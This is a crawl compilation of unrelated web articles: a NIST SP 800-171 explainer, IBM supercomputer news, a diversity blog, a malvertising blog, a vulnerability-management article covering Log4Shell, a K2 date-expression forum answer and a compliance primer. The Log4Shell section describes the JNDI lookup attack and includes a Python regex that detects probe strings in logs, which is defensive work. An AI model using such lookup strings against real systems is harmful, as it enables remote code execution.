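    print(f"{n} characters: ~{brute_force_years(n):.3g} years")
# 8 chars:  ~0.0193 years (about a week)
# 10 chars: ~171 years
# 12 chars: ~1.51e+06 years
```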
Our job is to help companies create more unified business functions, improve customer service, and utilize technology to move forward. Chicago-experienced IT consulting experts will make your technology work for you and keep you from spending endless, frustrating hours managing your business IT. Managed IT is when the Infiniwiz team proactively takes care of all the IT headaches and hassles for you…So you can get done on your "to-do" list – like growing the business! | <urn:uuid:a20e164d-fe2a-4ec5-8094-5a1924cea063> | CC-MAIN-2024-38 | https://www.infiniwiz.com/kali-nethunter-allows-hackers-access-to-easy-passwords-in-two-minutes/ | 2024-09-15T20:15:56Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651647.78/warc/CC-MAIN-20240915184230-20240915214230-00513.warc.gz | en | 0.934071 | 591 | 3.15625 | 3 |
What is NIST SP 800-171?
Learn about NIST SP 800-171, a set of guidelines designed to ensure federal data remains confidential when shared in nonfederal systems, what it covers, requirements, and more, in this week's Data Protection 101.
NIST SP 800-171 is an important set of guidelines that aim to ensure the safety and confidentiality of sensitive federal data. Here’s a look at what NIST encompasses and what’s required of affected entities.
Definition of NIST SP 800-171
NIST SP 800-171 is a document of guidelines published by the National Institute of Standards and Technology (NIST) in 2015, with compliance required as of December 31, 2017. The purpose of the guidelines is to “ensure that sensitive federal information remains confidential when stored in nonfederal information systems and organizations.” Enforcement of these regulations is handled directly by the Department of Defense, making compliance absolutely mandatory.
There are unavoidable occasions where federal data (any data related to the federal government) is held or received by third parties. Contractors and executive agencies who aid federal agencies commonly store or transmit sensitive data. These cases are regulated by NIST SP 800-171.
Cyber threats are ever-increasing and becoming more sophisticated. For this reason, the NIST guidelines have been revised a number of times. In fact, the initial version was replaced by NIST SP 800-171 Rev. 1. "Rev 1" has since been updated three times. Its current version (as of this article being written) was updated on June 7th, 2018.
What Does NIST SP 800-171 Rev. 1 Cover?
The NIST document sets security regulations in 14 different categories, including:
● Access Control
● Awareness and Training
● Audit and Accountability
● Configuration Management
● Identification and Authentication
● Incident Response
● Maintenance
● Media Protection
● Personnel Security
● Physical Protection
● Risk Assessment
● Security Assessment
● System and Communications Protection
● System and Information Integrity
All of these categories and regulations are to protect controlled unclassified information (CUI). CUI is federal data that is not classified, yet still sensitive. For instance, the U.S. government marks certain sensitive data "For Official Use Only." While not classified, this designation means that the information is not meant for public consumption.
NIST SP 800-171 Requirements
Dozens of requirements are outlined across the 14 different categories. For instance, access control requires:
● Maintaining a list of authorized users
● Stating the roles and functions of all users
● Limiting permissions where possible
● Enable auditing
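As a loose illustration only (a real 800-171 program is mostly process, not code), here is a minimal Python sketch of the four items above: an authorized-user list, stated roles, limited permissions, and audited access decisions.

```python
import logging
from dataclasses import dataclass

logging.basicConfig(level=logging.INFO)  # stand-in for a real audit trail

@dataclass
class User:
    name: str
    role: str                              # stated role/function of the user
    permissions: frozenset = frozenset()   # kept as small as possible

# Maintained list of authorized users
AUTHORIZED = {
    "jdoe": User("jdoe", "analyst", frozenset({"read"})),
    "asmith": User("asmith", "admin", frozenset({"read", "write"})),
}

def check_access(username: str, action: str) -> bool:
    user = AUTHORIZED.get(username)
    allowed = user is not None and action in user.permissions
    # Every decision is logged so events can be audited later
    logging.info("user=%s action=%s allowed=%s", username, action, allowed)
    return allowed

print(check_access("jdoe", "write"))  # False, and the denial is audited
```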
These are just a few of the requirements that fall under access control alone. However, all regulations outlined in NIST SP 800-171 can be summed up in two broad categories — administrative and technical.
These are the regulations that must be maintained and implemented by individuals, contractors, and executive agencies who deal with CUI. Many of these items include reviewing procedures, reading reports, and reporting vulnerabilities/incidents. To continue with the access control example, affected entities must review audited events annually (according to SP 800-171, control number 3.3.3).
Other measures include physical protections. These requirements include everything from the hardware (e.g., servers) to the buildings in which data is kept. Things as basic as locks on the doors and procedures for handling guests within an establishment are covered in the documents guidance.
With much of the data being in digital form and transmitted over the Internet, there are requirements that denote the need for technological solutions. These technologies are to create the reports, limit the access, and create digital security. Many organizations will have to employ third-party help of their own to create, implement, and comply with these requirements.
A large number of the technical requirements are to monitor, prevent, and warn organizations. Things like digital loss prevention, threat protection, data controls, and many more technical requirements exist in SP 800-171. NIST illustrates these protections with an incident response lifecycle diagram (not reproduced here). Let's quickly break down each component of that lifecycle:
- Preparation: This would include things like proper onboarding of individuals who will have access to CUI data. Proper implementation of technology and software is a critical piece of preparation.
- Detection & Analysis: Analysis can fall under both administrative and technical requirements. Software can analyze data in order to detect threats and individuals can analyze reports provided by software.
- Containment, Eradication & Recovery: In the event of an incident (breach or loss of data), there are steps to take. These include containing/closing the incident, eradicating the vulnerability that led to the incident and recovering lost data (where possible).
- Post-Incident Activity: Once the incident has been contained, there are certain things that must take place. Agencies must be notified and reports must be filed.
Once all incident activity has been properly handled, lessons learned from errors made can be implemented to better prepare and guard against future threats. From the administrative standpoint, a correction of errors should be made by all parties involved. On the technical side, changes to hardware and software may be necessary.
NIST SP 800-171 is a broad set of guidelines and requirements that aim to ensure the integrity of sensitive federal data. But these regulations are of concern to more than just government entities; it’s imperative that any entity that receives, transmits, stores, or otherwise comes into contact with covered data complies with these requirements. | <urn:uuid:234b77f5-d769-4854-a702-0cca54a05f93> | CC-MAIN-2024-38 | https://www.digitalguardian.com/blog/what-nist-sp-800-171 | 2024-09-09T21:37:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651157.15/warc/CC-MAIN-20240909201932-20240909231932-00277.warc.gz | en | 0.93257 | 1,186 | 2.703125 | 3 |
For the tenth consecutive time, an IBM system has achieved the number-one position in the ranking of the world's most powerful supercomputers. The IBM computer built for the "roadrunner project" at Los Alamos National Lab-the first in the world to operate at speeds faster than one quadrillion calculations per second (petaflop)-remains the world speed champion.
IBM has also announced its intent to break the exaflop barrier, and has created a research 'collaboratory' in Dublin, in partnership with the Industrial Development Agency (IDA) of Ireland, which is focused on both achieving exascale computing and making it useful to business. An exaflop is a million trillion calculations per second, which is 1,000 times faster than today's petaflop-class systems.
The latest semi-annual ranking of the World's TOP500 Supercomputer Sites was released during the International Supercomputing Conference in Hamburg, Germany. Results show the IBM system at Los Alamos National Lab, which clocked in at 1.105 petaflops, is nearly three times as energy-efficient as the number-two computer while delivering similar levels of petascale computing power. IBM's number-one system performs 444.9 megaflops per watt of energy, compared with only 154.2 megaflops per watt for the number-two system.
| <urn:uuid:785488e5-4196-42e4-8744-e3751b397428> | CC-MAIN-2024-38 | https://www.dbta.com/Editorial/News-Flashes/IBM-Continues-to-Lead-TOP500-Supercomputer-List-54953.aspx | 2024-09-11T03:03:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651343.80/warc/CC-MAIN-20240911020451-20240911050451-00177.warc.gz | en | 0.937033 | 294 | 3.03125 | 3 |
Today marks the 112th International Women's Day (IWD), which celebrates the social, economic, cultural and political achievements of women around the globe. Along with celebrating the achievements of women, it is an opportunity to highlight the ongoing and evolving struggle for women's rights and equality.
This year’s theme asks us to "Embrace Equity." It's a provocative theme that challenges societies, schools, and workplaces to move beyond the idea of equal opportunity alone and instead create opportunities that are inclusive.
But wait—aren't equity and equality pretty much the same thing?
Understanding the difference between equity and equality
Though equity and equality get used interchangeably, the two concepts have fundamental differences.
Let's start with equality. Societal and workplace reforms that are geared towards equality strive to give individuals or groups the same resources or opportunities. While it sounds nice in principle, policies that promote equality may unintentionally recreate the barriers they aspire to remove.
Consider the classic illustration of spectators of different heights watching a game over a fence: equality, which provides the same box for everyone to stand on, doesn't translate into fair outcomes. The person who already had the height advantage maintains that advantage, while the shortest spectator still has the same view as before stepping on the box.
Equity, on the other hand, acknowledges that "people don't begin life in the same place, and that circumstances can make it more difficult for people to achieve the same goals." Changing circumstances often takes systemic change. To address inequities through systemic change, societies and workplaces need to recognize the historical and individual circumstances of marginalized groups, including women, people of color, disabled people, LGBTQ+, and other underserved communities.
In the workplace, embracing equity happens when employers "consider the historical and sociopolitical factors that affect opportunities and experiences so that policies, procedures and systems can help meet people's unique needs without one person or group having an unfair advantage over another," according to Gallup.
What does that mean in practice? Gender equity reforms can impact all aspects of work and often requires employers to question things in the workplace that feel banal and traditional.
Some examples of equity related questions include:
- Hiring: Are certain application requirements like "leadership experience" unintentionally excluding women from consideration, since they have fewer opportunities for leadership roles in the first place?
- Compensation: Are raises and promotions favoring certain groups of people?
- Accommodations: Have certain policy changes, such as the end of working from home, disproportionately affected women?
Embracing Equity at HYCU
As a global company, HYCU has a diverse workforce. Luckily, everyone from the executive leadership team on down is committed to embracing equity.
Though we're taking time to celebrate #EmbracingEquity today, it's a year-round job here at HYCU. It's one reason why HYCU was named in the top 50 of America's Best Startup Employers by Forbes.
Equity doesn't mean the same thing for everyone, though. That's why, to celebrate IWD, we asked everyone in the company to answer the question, "What does equity mean to you?"
We'll be posting some of the answers we got in our social media feeds on Twitter, LinkedIn and YouTube. To kick things off, though, be sure to check out this conversation on equity in the workplace between HYCU's CMO, Kelly Hopping, and Theresia Gouw, Founding Partner at Acrew Capital.
Join HYCU today in taking time to recognize the pioneering women who are challenging the norms, breaking down the barriers, and fighting for equitable workplaces across the globe. | <urn:uuid:dfa00387-7bee-4003-aa2f-4f11e470d585> | CC-MAIN-2024-38 | https://www.hycu.com/blog/embracing-equity-international-womens-day-2023 | 2024-09-12T09:13:59Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651440.11/warc/CC-MAIN-20240912074814-20240912104814-00077.warc.gz | en | 0.954692 | 730 | 3.375 | 3 |
Malvertising targets users by adding harmful software to seemingly harmless ads and can lead to serious issues, like ransomware. To protect yourself against this rapidly growing threat, it’s essential to understand how malvertising works and a few strategies to keep it at bay.
Unmasking Malvertising Attacks
Malvertising, a portmanteau of “malicious advertising,” refers to a technique employed by cybercriminals to spread malware through online advertisements. Unlike phishing, which often relies on user negligence, malvertising spreads silently, even when users adhere to cybersecurity best practices.
In a malvertising attack, cybercriminals inject malicious code or malware into seemingly harmless online ads which are then distributed through various online advertising networks and displayed on legitimate websites. Techniques include deceptive ads that lead to legitimate-looking (but bogus) websites, hiding malware within banner ad pixels, and “drive-by-downloads,” in which malware automatically downloads and installs itself.
Malvertising campaigns leverage everyday ad publishers like Google Ads, AdPlugg, or Propeller Ads to deliver their payloads, allowing cybercriminals to target larger audiences. Even reputable publishers cannot guarantee immunity, as malvertisers exploit vulnerabilities in ad networks or legitimately purchase ad space. Almost any website that carries advertising, including trusted sites like the New York Times and the NFL, could be infected.
The Nexus of Malvertising and Ransomware
While malvertising can deliver various types of nastiness, ransomware is the most prevalent, constituting 70% of malvertising campaigns. These attacks increasingly bypass traditional defenses, utilizing techniques like fileless malware to target system vulnerabilities, and demand proactive measures in any organization’s data protection strategy.
Ransomware is often accompanied by data exfiltration attempts and inflicts significant damage, both financially and reputationally. It's bad enough that the average ransom payment is around $258,000. Even worse is the total cost of an attack: $4.54 million, including investigation, remediation and compensation. In extreme cases, organisations may face closure, exemplified by the 2022 ransomware-induced shuttering of Lincoln College in Illinois.
The US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI both recommend using an ad blocker to intercept malicious code. Do your research, though: there are malicious ad blockers out there, and some malvertising campaigns are tailored to bypass blockers altogether. Combine that with the fact that some massively popular sites like YouTube require ad blockers to be disabled, and you're going to need some additional precautions.
Antivirus tools play a crucial role in safeguarding against malware, including malvertising. However, because their detection is signature-based, newer threats, such as fileless malware, which leaves no digital footprint, can render them ineffective. EDR/XDRs have similar gaps, making emerging Defense in Depth strategies like Automated Moving Target Defense (AMTD) critical to a complete security posture.
As browsing habits shift towards mobile devices, malvertising adapts to exploit vulnerabilities within mobile web browsers. Smaller touchscreens increase the likelihood of accidental ad clicks (why do you think they make the Xs so small?). Also, ad blockers and antivirus software are installed much less frequently on mobile devices. This is particularly concerning as more and more personal devices connect to business networks.
As always, education and awareness are critical. Be aware of common tactics, such as misleading banner ads or deceptive pop-ups. Avoid clicking on ads from unfamiliar or suspicious websites. Exercise caution when confronted with ads making unrealistic offers or promotions.
(You’re not still using Temu are you?)
How Arms Cyber Can Help
Ransomware attacks present a significant threat due to their ability to evade traditional defenses. At Arms Cyber, we offer an innovative Endpoint Protection Platform (EPP) designed to tackle this challenge head-on. Our solution employs proactive measures such as runtime Moving Target Defenses (MTD), deception techniques, command and behavior analysis, and anti-detonation defenses to reliably detect and prevent ransomware attacks while minimizing false positives. By preventing the disablement of NGAV and EDR solutions and thwarting in-memory manipulation of modern malware, organizations can trust in the effectiveness of their cybersecurity investments without worrying about attacker evasion. | <urn:uuid:5492f39a-5891-4455-a95e-829f284cbb26> | CC-MAIN-2024-38 | https://www.armscyber.com/post/ads-gone-rogue-a-quick-look-at-malvertising | 2024-09-14T18:44:37Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00777.warc.gz | en | 0.915217 | 870 | 2.84375 | 3 |
Vulnerability Report: Unveiling Critical Vulnerabilities in Cybersecurity
In the context of cybersecurity, a vulnerability refers to a weakness or flaw in a system, network, software or application that can be exploited by malicious actors to gain unauthorised access, disrupt normal functioning, steal sensitive information or perform other harmful activities. These vulnerabilities can arise from programming errors, configuration mistakes, design flaws or outdated software versions.
Vulnerability assessment is crucial for identifying & understanding weaknesses in systems & applications. By conducting regular assessments, organisations can proactively identify vulnerabilities, prioritise them based on severity & take appropriate measures to mitigate the associated risks. Reporting vulnerabilities is equally important as it allows for responsible disclosure to relevant parties, such as vendors or developers, who can then work on remediation.
The purpose of this Journal is to shed light on how critical vulnerabilities pose significant risks to cybersecurity. By unveiling & analysing these vulnerabilities, the Journal aims to raise awareness among individuals & organisations about their potential impact.
Understanding Vulnerability Assessment
Vulnerability Assessment [VA] is a systematic process of identifying, quantifying & prioritising vulnerabilities in systems, networks, applications or any digital assets. The objectives of vulnerability assessment include:
- Identifying vulnerabilities: The primary goal is to discover potential weaknesses or flaws that could be exploited by attackers.
- Quantifying risk: Assessing the severity & potential impact of vulnerabilities helps prioritise mitigation efforts based on the level of risk they pose.
- Prioritising remediation: By understanding the risks associated with vulnerabilities, organisations can prioritise their resources to address the most critical vulnerabilities first.
The vulnerability assessment process typically involves the following key steps:
- Asset identification: Identify the assets within the scope of assessment, including systems, networks, applications or devices.
- Vulnerability scanning: Utilise automated tools to scan the identified assets & detect known vulnerabilities. This involves analysing configurations, network services & software versions.
- Vulnerability analysis: Analyse the scan results to determine the severity & potential impact of each identified vulnerability. This step involves assigning a risk rating or score.
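As a toy illustration of the analysis step, the sketch below ranks findings by a severity score weighted by asset criticality. The weighting scheme is an assumption for illustration; real programmes typically combine CVSS scores with business context:

```python
# Toy prioritisation: rank findings by severity weighted by asset criticality.
findings = [
    {"id": "VULN-1", "cvss": 9.8, "asset_criticality": 0.9},
    {"id": "VULN-2", "cvss": 6.5, "asset_criticality": 1.0},
    {"id": "VULN-3", "cvss": 9.8, "asset_criticality": 0.3},
]

for f in sorted(findings, key=lambda f: f["cvss"] * f["asset_criticality"],
                reverse=True):
    print(f["id"], round(f["cvss"] * f["asset_criticality"], 2))
# Note how a medium-severity flaw on a critical asset (VULN-2) can
# outrank a critical flaw on a low-value asset (VULN-3).
```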
Vulnerability assessment employs various tools & techniques to aid in the identification & analysis of vulnerabilities. These may include:
- Vulnerability Scanners: Automated tools that scan networks, systems & applications to detect known vulnerabilities by comparing against a database of known vulnerabilities.
- Penetration Testing: Simulating real-world attacks to identify vulnerabilities that automated scanners may miss. Penetration testing involves manual exploration & exploitation of potential weaknesses.
- Threat Modelling: Evaluating potential threats & vulnerabilities by considering the system architecture, attack vectors & potential impact. This technique helps identify vulnerabilities early in the development process.
- Risk Assessment: Assessing the likelihood & potential impact of vulnerabilities to prioritise remediation efforts based on their risk level.
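To ground the scanning technique, below is a deliberately tiny Python sketch of the banner-grabbing idea behind many network scanners. The vulnerable-banner table is a placeholder; real tools consult large, curated vulnerability databases & should only ever be pointed at hosts you are authorised to test:

```python
import socket

# Toy banner-to-advisory table (illustrative placeholders, not a real feed).
KNOWN_VULNERABLE = {
    "OpenSSH_7.2": "example advisory: upgrade OpenSSH",
    "vsFTPd 2.3.4": "example advisory: known-backdoored build",
}

def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """Read the greeting banner that services like SSH/FTP/SMTP send."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024).decode(errors="replace").strip()

def scan(host: str, ports=(21, 22, 25)) -> None:
    for port in ports:
        try:
            banner = grab_banner(host, port)
        except OSError:
            continue  # closed or filtered port
        for needle, advisory in KNOWN_VULNERABLE.items():
            if needle in banner:
                print(f"{host}:{port} -> {banner!r}: {advisory}")

scan("192.0.2.10")  # RFC 5737 documentation address; scan only hosts you own
```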
The Impact of Vulnerabilities
Vulnerabilities can have significant consequences, leading to various detrimental outcomes, including:
- Unauthorised access: Exploited vulnerabilities can provide attackers with unauthorised access to systems, networks or sensitive data, compromising the confidentiality, integrity & availability of the information.
- Data breaches: Vulnerabilities can be leveraged to gain access to sensitive data, resulting in data breaches that can lead to financial loss, reputational damage, legal implications & identity theft.
- Service disruption: Certain vulnerabilities enable attackers to disrupt or disable critical services, causing downtime, operational disruptions & financial losses for organisations.
- Malware & ransomware infections: Exploiting vulnerabilities can facilitate the delivery & execution of malware or ransomware, leading to unauthorised control over systems, data encryption & extortion attempts.
Examples of Real-World Incidents Caused by Vulnerabilities
Numerous real-world incidents have demonstrated the impact of vulnerabilities on organisations & individuals. Some notable examples include:
- WannaCry Ransomware Attack (2017): The WannaCry attack exploited a vulnerability in the Windows SMB service using the leaked EternalBlue exploit. It resulted in widespread infections, impacting hundreds of thousands of systems worldwide & causing significant disruptions in various sectors, including healthcare & government.
- Meltdown & Spectre Vulnerabilities (2018): These vulnerabilities affected a wide range of processors, including those from Intel, AMD & ARM. They allowed attackers to access sensitive information stored in memory, potentially compromising passwords, encryption keys & other critical data.
Proactive vulnerability management is crucial for several reasons:
- Risk reduction: By identifying & addressing vulnerabilities before they are exploited, organisations can significantly reduce the risk of data breaches, system compromises & service disruptions.
- Compliance requirements: Many regulatory frameworks & industry standards mandate regular vulnerability assessments & mitigation as part of maintaining compliance & ensuring data protection.
- Reputation & trust: Organisations that proactively manage vulnerabilities demonstrate their commitment to security, fostering trust among customers, clients & stakeholders.
- Cost savings: Proactive vulnerability management can help prevent costly incidents & minimise the financial impact of data breaches, system downtime & recovery efforts.
Recent Vulnerability Discoveries
Below is a list of noteworthy vulnerabilities that have been disclosed in recent times:
- Log4Shell [CVE-2021-44228]: A critical vulnerability in the Apache Log4j library, widely used for logging in Java-based applications. It allows remote code execution & has raised concerns due to its widespread impact.
- BadAlloc: A series of vulnerabilities discovered in various IoT & embedded devices’ Real-Time Operating Systems [RTOS]. Exploitation could lead to remote code execution, impacting critical systems in sectors such as healthcare, industrial control & aerospace.
Potential Risks & Implications of Each Vulnerability:
- Log4Shell: The Log4Shell vulnerability has the potential for widespread impact due to the extensive usage of the Apache Log4j library. Exploitation can lead to remote code execution, enabling attackers to gain control over affected systems & potentially initiate further attacks.
- BadAlloc: The BadAlloc vulnerabilities in RTOS can have significant implications for critical systems. Successful exploitation could lead to Denial-of-Service [DoS] attacks, remote code execution & unauthorised access, impacting sectors relying on embedded devices.
Description of Affected Systems, Software or Technologies:
- Log4Shell: The Log4Shell vulnerability affects applications & systems using the Apache Log4j library for logging, which is widely utilised in Java-based applications across different platforms.
- BadAlloc: The BadAlloc vulnerabilities were discovered in various Real-Time Operating Systems [RTOS] used in IoT devices, embedded systems & industrial control systems, potentially affecting critical infrastructure across different industries.
Case Study: Vulnerability Analysis
For this case study, we will focus on the Log4Shell vulnerability [CVE-2021-44228]. This vulnerability gained significant attention due to its widespread impact & potential for remote code execution in systems utilising the Apache Log4j library.
Step-by-Step Analysis of the Vulnerability’s Discovery & Disclosure
- Discovery: The Log4Shell vulnerability was initially discovered by security researchers who identified a flaw in the Apache Log4j library's JNDI message-lookup handling. This flaw allowed remote attackers to execute arbitrary code by sending specially crafted requests.
- Research & Proof-of-Concept: Upon discovery, researchers conducted further investigation & developed a Proof-of-Concept [PoC] to demonstrate the exploitability of the vulnerability.
- Responsible Disclosure: The researchers followed responsible disclosure practices by privately notifying the Apache Software Foundation, the maintainers of the Log4j library, about the vulnerability.
- Public Disclosure: Once a fix or mitigation was available, the vulnerability was publicly disclosed to raise awareness among users of the affected library.
Discussing the Technical Details & Impact of the Vulnerability
The Log4Shell vulnerability exploited a flaw in the Apache Log4j library, specifically in its Java Naming & Directory Interface [JNDI] lookup feature. The vulnerability allowed an attacker to include a malicious lookup string within a specially crafted request, which, when logged by an application utilising Log4j, would trigger remote code execution.
The impact of the Log4Shell vulnerability was severe due to the widespread usage of the Apache Log4j library in various Java-based applications & systems. By successfully exploiting the vulnerability, an attacker could gain unauthorised control over affected systems, potentially leading to unauthorised access, data breaches, system compromise & the ability to perform additional malicious activities.
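As a purely illustrative detection example, the Python sketch below greps application logs for the characteristic ${jndi:...} lookup strings seen in Log4Shell probes. The log path is hypothetical & the pattern only catches simple obfuscations; real scanners & WAF rules go much further:

```python
import re
from pathlib import Path

# Matches common Log4Shell probe strings such as ${jndi:ldap://...},
# including simple obfuscations like ${${lower:j}ndi:...}.
JNDI_PATTERN = re.compile(r"\$\{.{0,30}?j.{0,30}?ndi.{0,30}?:", re.IGNORECASE)

def scan_logs(log_dir: str) -> None:
    for path in Path(log_dir).glob("*.log"):
        for lineno, line in enumerate(path.open(errors="replace"), start=1):
            if JNDI_PATTERN.search(line):
                print(f"{path}:{lineno}: possible JNDI lookup payload")

scan_logs("/var/log/myapp")  # hypothetical log directory
```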
Reporting Vulnerabilities Responsibly
When creating & submitting vulnerability reports, it is important to follow best practices to ensure clear communication & facilitate the remediation process. Some recommended practices include:
- Gather sufficient information: Collect all relevant technical details about the vulnerability, including its nature, impact, affected systems & steps to reproduce it.
- Use encrypted communication: Use secure & encrypted communication channels when sharing vulnerability reports. This helps protect the confidentiality of the information & prevents unauthorised access or interception.
- Maintain confidentiality: Unless agreed upon otherwise with the vendor, keep the vulnerability & its details confidential until the agreed-upon disclosure date.
Addressing Vulnerabilities & Mitigation Strategies
Collaboration between security researchers & software vendors is crucial for effective vulnerability remediation. When researchers responsibly disclose vulnerabilities to vendors, it initiates a collaborative process to address the issues.
- Open communication: Establishing clear lines of communication between researchers & vendors enables effective information exchange & collaboration throughout the remediation process.
- Sharing technical details: Researchers should provide vendors with detailed technical information about the vulnerability, including its impact, root cause & potential mitigations.
Organisations can adopt proactive strategies to address vulnerabilities effectively & reduce their exposure to potential threats. Here are some key strategies:
- Regular Vulnerability Assessments: Conducting regular vulnerability assessments helps organisations identify & prioritise vulnerabilities within their systems & infrastructure.
- Patch management: Establish a robust patch management process to ensure that software & systems are regularly updated with the latest security patches.
- Employee training & awareness: Educate employees about the importance of cybersecurity & their role in identifying & reporting potential vulnerabilities.
Patch management & regular security updates are vital for maintaining a secure environment & mitigating the risks posed by vulnerabilities. Here’s why they are important:
- Vulnerability mitigation: Security patches & updates often include fixes for known vulnerabilities.
- Protection against exploits: Attackers actively search for & exploit vulnerabilities in software & systems.
- Compliance requirements: Many industry regulations & frameworks require organisations to maintain up-to-date software & security patches.
The Future of Vulnerability Management
Vulnerability management is continually evolving to keep pace with the ever-changing cybersecurity landscape. Some emerging trends & technologies in vulnerability management are
- Threat intelligence integration: Integration of threat intelligence feeds & platforms into vulnerability management systems allows organisations to prioritise vulnerabilities based on real-time threat intelligence data.
- DevSecOps & sutomation: The integration of security into the DevOps process, known as DevSecOps, promotes the automation of vulnerability management tasks.
Looking ahead, several predictions can be made for the future of vulnerability assessment & reporting:
- Increased automation & machine learning: Automation & machine learning techniques will play a more prominent role in vulnerability assessment.
- Integration with Security Orchestration, Automation & Response [SOAR]: Vulnerability management solutions will integrate with SOAR platforms to streamline incident response workflows.
Artificial Intelligence [AI] & automation will play a crucial role in vulnerability identification. Some key aspects include:
- Enhanced vulnerability scanning: AI-powered vulnerability scanners can analyse vast amounts of data, identify patterns & detect vulnerabilities that may be challenging for traditional scanners to discover.
- Continuous monitoring & adaptive defence: AI can enable real-time monitoring of systems & networks, continuously analysing data to detect & respond to emerging vulnerabilities & threats.
Vulnerability assessment & reporting play a crucial role in maintaining robust cybersecurity. By conducting vulnerability assessments, organisations can identify & prioritise vulnerabilities, allowing them to proactively address security weaknesses.
Addressing vulnerabilities requires a collective effort from individuals, organisations & the broader cybersecurity community. It is essential to foster collaboration between security researchers, vendors & users to share knowledge, exchange information & collectively work towards identifying & remediating vulnerabilities.
Cybersecurity awareness & action are paramount in safeguarding against vulnerabilities & cyber threats. It is crucial to inspire individuals & organisations to prioritise cybersecurity by investing in education, training & awareness programs. By promoting best practices, encouraging responsible behaviour & staying updated on emerging threats, we can build a resilient cybersecurity ecosystem.
What is a Vulnerability Report?
A Vulnerability Report is a document that provides information about a security vulnerability in a system, software or infrastructure, including its impact, severity & potential mitigations.
What should a Vulnerability Report include?
A Vulnerability Report should include details about the vulnerability, such as its description, impact, affected systems or software versions, steps to reproduce & recommendations for remediation.
What does a Vulnerability Report look like?
A Vulnerability Report typically follows a structured format, including sections such as an executive summary, vulnerability description, impact analysis, proof of concept & recommended actions for remediation.
What are the 4 stages of vulnerability?
The four stages of vulnerability are identification, classification, prioritisation & remediation. | <urn:uuid:ef07e5f1-e535-4245-82a3-408e1593e375> | CC-MAIN-2024-38 | https://www.neumetric.com/vulnerability-report/ | 2024-09-14T17:32:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00777.warc.gz | en | 0.899856 | 2,730 | 3.25 | 3 |
From Date Expression: Add Days ( Start Of Month ( Subtract Days ( Start Of Month ( Current Date ) , 1 ) ) , 22 )
To Date Expression: Add Days ( Start Of Month ( Current Date ) , 21 )
In my example I have used a calendar control as this made testing easier; for your purpose, just replace the calendar control with the current date.
I have broken the problem into 3 steps.
- Calculate the 25th of this month
- Calculate the 25th of last month
- Decide which one is appropriate
Below are the detailed steps.
1. Calculate 25th of this month
We calculate the start of this month using the Start Of Month function.
Then Add 24 days to get to the 25th day of the month using the Add Days function
When working with expressions I find it easiest to build them from the outermost function inwards.
Start with Add Days
Then drag Start of Month into the first input field
Lastly drag the date into the input for the Start of Month function (substitute current date for your solution).
2. Calculate the 25th day of last Month (read this one a couple of times if you need to)
With the functions we have available my calculations are broken down below.
Start of this month (Calendar) - 1 Day = End of Last Month
Start of Month (End of Last Month) = Start of Last Month
Start of Last Month + 24 Days = 25th day of Last Month
I used Add Days and passed in -1, but this can be replaced by Subtract Days instead.
Taking the same outer most to Inner most approach as before.
Add 24 days
Calculate the Start of Last Month
By subtracting 1 day
From the Start of This Month
Substitute Current Date for your solution
3. Decide which date to use
Now, based on the current date, choose which value to use with logical operators.
The original post includes screenshots of the final expressions and of tests showing them working.
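For readers outside the workflow designer, here is a rough Python equivalent of the same three steps. The decision rule in step 3 is my assumption (pick the most recent 25th on or before the current date), since the post leaves the logical operators to the reader.

```python
from datetime import date, timedelta

def most_recent_25th(current: date) -> date:
    """Mirror the three steps above: 25th of this month, 25th of last
    month, then choose (assumed rule: the most recent 25th on or
    before `current`)."""
    # Step 1: 25th of this month = start of this month + 24 days
    start_of_this_month = current.replace(day=1)
    this_month_25th = start_of_this_month + timedelta(days=24)

    # Step 2: 25th of last month
    end_of_last_month = start_of_this_month - timedelta(days=1)  # start of month - 1 day
    start_of_last_month = end_of_last_month.replace(day=1)
    last_month_25th = start_of_last_month + timedelta(days=24)

    # Step 3: decide which one is appropriate
    return this_month_25th if current >= this_month_25th else last_month_25th

print(most_recent_25th(date(2024, 9, 10)))  # -> 2024-08-25
print(most_recent_25th(date(2024, 9, 26)))  # -> 2024-09-25
```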
I hope this helps | <urn:uuid:064472c9-f6bc-47fc-929c-953c734d302d> | CC-MAIN-2024-38 | https://community.nintex.com/k2-cloud-12/calculate-the-25th-day-of-every-month-based-on-the-current-date-60615 | 2024-09-15T22:44:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651668.26/warc/CC-MAIN-20240915220324-20240916010324-00677.warc.gz | en | 0.867119 | 426 | 2.9375 | 3 |
What is Cyber Security Compliance?
Cyber security compliance refers to an organisation’s adherence to laws, regulations, and standards to protect its digital information and systems from cyber threats. Cyber security compliance is attained by implementing security controls, policies, and other measures to ensure the integrity, confidentiality, and availability of data.
While certain government organisations and industries may have specific standards that organisations must comply with, there are also universal standards and frameworks that organisations of all sizes can use to bolster their information security.
Benefits of Cyber Security Compliance
No matter what your reason for wanting to achieve cyber security compliance may be, organisations that do comply with robust cyber security standards realise a wide range of benefits. Some of these benefits include:
- Risk Reduction – Compliance minimises the likelihood of data breaches and cyber attacks by implementing robust security measures.
- Legal Protection – Organisations that comply with legal and industry-recognised standards can often avoid legal penalties and fines when breaches occur.
- Reputational Enhancement – Compliant organisations can build trust with customers, partners, and stakeholders, enhancing their overall reputation.
- Operational Continuity – Compliance ensures business operations remain uninterrupted by preventing and effectively responding to cyber threat events and incidents.
- Competitive Advantage – Organisations that demonstrate a commitment to security can differentiate themselves in the market and attract more customers.
Types of Data Subject to Cyber Security Compliance
When data breaches do occur, there is no shortage of sensitive data that can be compromised. As such, many cyber security laws and compliance standards have been developed to protect certain types of sensitive data. This can include:
Personally Identifiable Information (PII)
PII refers to any data that can be used to identify a specific individual, either on its own or when combined with other information. PII might include details like names, social security numbers, addresses, phone numbers, email addresses, and biometric data. Loss of PII can lead to identity theft, fraud, and privacy violations.
Protected Health Information (PHI)
